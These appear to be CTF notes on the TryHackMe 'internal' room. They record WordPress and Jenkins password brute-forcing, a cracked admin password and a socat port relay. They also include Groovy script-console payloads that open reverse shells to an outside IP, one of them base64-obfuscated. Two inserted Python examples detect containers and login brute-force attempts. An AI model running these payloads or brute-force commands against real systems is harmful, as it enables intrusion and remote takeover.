internal

https://tryhackme.com/room/internal

http://internal.thm/phpmyadmin/
http://internal.thm/blog/wp-login.php

- Wordpress 5.4.2
- Users - http://internal.thm/blog/index.php/wp-json/wp/v2/users/
- wpscan --url http://internal.thm/blog/ -o wps.txt -e vp,vt,u1-50
- wpscan --url http://internal.thm/blog/ -U admin -P ../rockyou.txt -t 50 --password-attack wp-login

admin:my2boys

python3 xmlrpc-bruteforcer.py -u admin -w ../rockyou.txt -x http://internal.thm/blog/xmlrpc.php

- phpmyadmin v4.6.6 default creds - root:<blank>

william:[redacted]

aubreanna:[redacted]

- inside a docker container? cat /proc/self/cgroup
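The cgroup check above is a one-liner, but it is not conclusive on its own: on a cgroup v2 host /proc/self/cgroup reads `0::/` both on the host and inside a container, so a second signal (an overlay root in /proc/self/mountinfo, or the /.dockerenv marker file) is needed to decide. The following is an added example, not part of the original notes or the room; the sample cgroup and mountinfo texts are constructed, and the indicator names are my own labels.

```python
import re
from pathlib import Path

# Constructed samples (assumptions, not captured from the room's machine).
CGROUP_V1_DOCKER = "12:pids:/docker/3f2a1b\n11:memory:/docker/3f2a1b\n"
CGROUP_V2_ANY = "0::/\n"   # cgroup v2 looks like this on the host AND in a container
MOUNTINFO_OVERLAY = (
    "25 20 0:22 / / rw,relatime - overlay overlay "
    "rw,lowerdir=/var/lib/docker/overlay2/l/A:/var/lib/docker/overlay2/l/B\n"
)
MOUNTINFO_HOST = "25 1 8:1 / / rw,relatime - ext4 /dev/sda1 rw\n"


def container_indicators(cgroup_text, mountinfo_text, dockerenv_present):
    """Return the list of container indicators found in the given evidence.

    An empty list means 'no evidence', not 'definitely on the host':
    cgroup v2 hides the container path, so the other two checks matter.
    """
    hits = []

    # cgroup v1 shows the container runtime in the path; v2 shows only "0::/".
    if re.search(r"/(docker|lxc|kubepods)[/.-]", cgroup_text):
        hits.append("cgroup-path")

    # /proc/self/mountinfo: "... mount_point options [optional...] - fstype source opts".
    # The root mount of a container is normally an overlay filesystem.
    for line in mountinfo_text.splitlines():
        fields = line.split()
        if "-" not in fields or len(fields) < 8:
            continue
        mount_point = fields[4]
        fstype = fields[fields.index("-") + 1]
        if mount_point == "/" and fstype == "overlay":
            hits.append("overlay-root")
            break

    # Docker creates /.dockerenv in every container it starts.
    if dockerenv_present:
        hits.append("dockerenv-file")

    return hits


def live_check():
    """Run the same logic against the current process (read-only, best effort)."""
    def read(path):
        try:
            return Path(path).read_text()
        except OSError:
            return ""
    return container_indicators(
        read("/proc/self/cgroup"),
        read("/proc/self/mountinfo"),
        Path("/.dockerenv").exists(),
    )


if __name__ == "__main__":
    print("indicators:", live_check() or "none")
```

`live_check()` only reads files the current user can already see, so it is safe to run on a host you are auditing; the three constructed samples show why the cgroup path alone gives a false negative on cgroup v2.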

jenkins 2.250

./socat TCP-LISTEN:9700,fork TCP:172.17.0.2:8080

ffuf -X POST -request rr -u http://10.10.47.108:9700/j_acegi_security_check -w ../userlist.txt:UN -w ../passwordlist.txt:PW -fr loginError -s

ffuf -X POST -u http://10.10.47.108:9700/j_acegi_security_check -d "j_username=admin&j_password=FUZZ&from=%2F&Submit=Sign+in" -w pwdl -fr loginError -H 'Content-Type: application/x-www-form-urlencoded'

- Groovy script RCE in Jenkins - <url>/script

#1
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '<cmd>'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

#2
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xNC4xNy4xNjkvNzkwMiAwPiYxJwo=}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

#3 Java socket variant (cmd is /bin/bash here; cmd.exe for windows)
String host="10.17.14.169";
int port=7902;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try {p.exitValue();break;}catch (Exception e){}
};
p.destroy();
s.close();

root:[redacted]

http://10.10.47.108:9700/j_acegi_security_check j_username=test&j_password=test&from=%2F&Submit=Sign+in
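Both password attacks in these notes (wpscan/xmlrpc against wp-login.php, ffuf against Jenkins' j_acegi_security_check) leave the same footprint in a web server or reverse-proxy access log: a burst of POSTs to one login endpoint from one source. The detector below is an added example, not part of the original notes or of the room; the log lines are constructed in combined log format, the endpoint table and thresholds are my own choices, and the status-code logic relies on WordPress answering a failed login with 200 (form re-rendered) and a successful one with 302.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Login endpoints seen in the notes, mapped to a label used in alerts (assumed labels).
LOGIN_ENDPOINTS = {
    "/blog/wp-login.php": "wordpress-login",
    "/blog/xmlrpc.php": "wordpress-xmlrpc",
    "/j_acegi_security_check": "jenkins-login",
}

# Apache/nginx combined log format: ip ident user [ts] "METHOD path proto" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],   # drop query string
        "status": int(m.group("status")),
    }


def detect_login_bruteforce(lines, threshold=10, window=timedelta(minutes=5)):
    """Alert when one source POSTs to one login endpoint >= threshold times inside window."""
    events = defaultdict(list)   # (ip, endpoint label) -> [(ts, status), ...]
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        label = LOGIN_ENDPOINTS.get(rec["path"])
        if label:
            events[(rec["ip"], label)].append((rec["ts"], rec["status"]))

    alerts = []
    for (ip, label), hits in sorted(events.items()):
        hits.sort()
        start = 0
        for end in range(len(hits)):          # sliding window over sorted timestamps
            while hits[end][0] - hits[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                break
        else:
            continue                           # never reached threshold inside one window
        alert = {"ip": ip, "endpoint": label, "posts": len(hits), "possible_success": None}
        if label == "wordpress-login":
            # WordPress: 200 = failed login (form re-rendered), 302 = successful login.
            # A 302 following a run of 200s is the event to triage first.
            failures = 0
            for _, status in hits:
                if status == 200:
                    failures += 1
                elif status == 302 and failures >= threshold:
                    alert["possible_success"] = True
                    break
            else:
                alert["possible_success"] = False
        # Jenkins answers both failed (-> /loginError) and successful logins with 302,
        # so the proxy log alone cannot separate them; leave possible_success as None
        # and check the Location header or Jenkins' own log for those sources.
        alerts.append(alert)
    return alerts


# --- constructed sample log (not captured from the room) ---------------------
def make_line(ip, ts, method, path, status):
    return (f'{ip} - - [{ts.strftime("%d/%b/%Y:%H:%M:%S %z")}] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "curl/7.68.0"')


_T0 = datetime(2024, 1, 1, 10, 0, 0, tzinfo=timezone.utc)
SAMPLE_LOG = (
    [make_line("10.0.0.5", _T0 + timedelta(seconds=3 * i), "POST", "/blog/wp-login.php", 200) for i in range(12)]
    + [make_line("10.0.0.5", _T0 + timedelta(seconds=40), "POST", "/blog/wp-login.php", 302)]
    + [make_line("10.0.0.9", _T0 + timedelta(minutes=i), "POST", "/blog/wp-login.php", 200) for i in range(3)]
    + [make_line("10.0.0.7", _T0 + timedelta(seconds=i), "POST", "/j_acegi_security_check", 302) for i in range(25)]
    + [make_line("10.0.0.9", _T0, "GET", "/blog/", 200), "not a log line at all"]
)

if __name__ == "__main__":
    for alert in detect_login_bruteforce(SAMPLE_LOG):
        print(alert)
```

In the sample, 10.0.0.5 trips the WordPress rule and its trailing 302 marks a probable successful guess, 10.0.0.7 trips the Jenkins rule without a success verdict, and 10.0.0.9 stays under the threshold. The same rule fits the socat forward in these notes: with the Jenkins container only reachable through a port relay, the relay host's log is the place the bursts show up.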

=========================================
PoC:
- xmlrpc system.multicall doesn't work
- login as admin into wp
- wp-login.php bruteforce
- upload malicious plugin for RCE - the plugin directory isn't writable
- theme directory is writable, uploaded shell
- mapped jenkins docker ip:port to machine ip:port using socat
- jenkins running in a docker container
- lets try bf'ing jenkins login
- injected reverse shell script in groovy
